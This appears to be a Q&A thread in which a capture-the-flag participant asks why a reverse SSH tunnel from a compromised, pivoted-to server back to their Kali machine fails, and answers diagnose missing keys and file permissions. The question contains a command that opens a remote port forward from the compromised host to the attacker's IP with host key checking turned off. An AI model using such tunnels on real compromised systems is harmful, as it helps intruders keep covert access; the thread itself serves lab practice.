# ssh reverse shell permission issues

Tags: linux, networking, ssh, shell, permissions

I'm taking part in a Capture the Flag (CTF) and I'm using Kali. I have access to a server (Server 1) via another server (Server 0) through which I pivoted.

Now I'm tasked with setting up a reverse SSH shell from Server 1. I am using the following command (as provided to me by the hints I had to use)

```
ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -fN -R 8080:a.b.c.d:80 myusername@e.f.g.h -v
```

a.b.c.d is the Server 1 IP address

e.f.g.h is my IP address

Running with -v I get the following error:

```
debug1: read_passphrase: can't open /dev/tty: No such device or address
debug1: Authentications that can continue: publickey,password
debug1: No more authentication methods to try.
Permission denied (publickey,password).
```

I have no idea if this means the issue is with the Kali end of things or with the permission levels on the compromised server.

Any help / ideas appreciated.

Answer (score 1, accepted):

You have a small problem, and a big problem.

The **big** problem is that authentication halts without having tried *any* method. The command you patched together is supposed to work with *cryptographic keys*, of which you seem to have none. That may be because you forgot to specify `-i /path/to/keys` on the CLI, or because you are trying to authenticate as root, but you have the keys as the user YourName (in other words, the keys are in `/home/YourName/.ssh` and they are not in `/root/.ssh`), or *viceversa*, or because you have not set up passwordless login at all for `myusername@e.f.g.h`.

The **small** problem is indicated by the error message

> debug1: read_passphrase: can't open /dev/tty: No such device or address

which is not worrisome at all: it is telling you that the above tunnel is created without a tty, and this is a problem because there is some error message which cannot be shown, exactly because there is no tty. Most likely, the error message is `Host key verification failed`, because you specified that the file containing Known Host Keys is `/dev/null`, via the option `-o UserKnownHostsFile=/dev/null`; but you also specified `-o StrictHostKeyChecking=no`, so the connection does not halt here.

You may get rid of such error message (probably) by adding the options `-t -t` (yes, twice), which will allocate a tty and thus display the error message (and check whether my hunch is indeed correct). Or you may simply forget about it, since it is largely irrelevant.

Comment: Thanks! your answer makes sense, however I can't work out where I need to either copy the keys to or specify the path to. The shell I have is on a remote server somewhere and I'm trying to ssh back to my kali box (not as root). The keys i have are in /root/.ssh but nowhere else it would seem.

Comment: @m0atz if you are user Me, the keys must be in `/home/Me/.ssh`, and the permissions (**very important**) are 700 for the directory `/home/Me/.ssh` and 600 for the key file. You call the keys by adding, to the command you wrote, `-i /home/Me/.ssh/FileName`. Make sure the directory and the keys belong to the user (Me) trying to connect.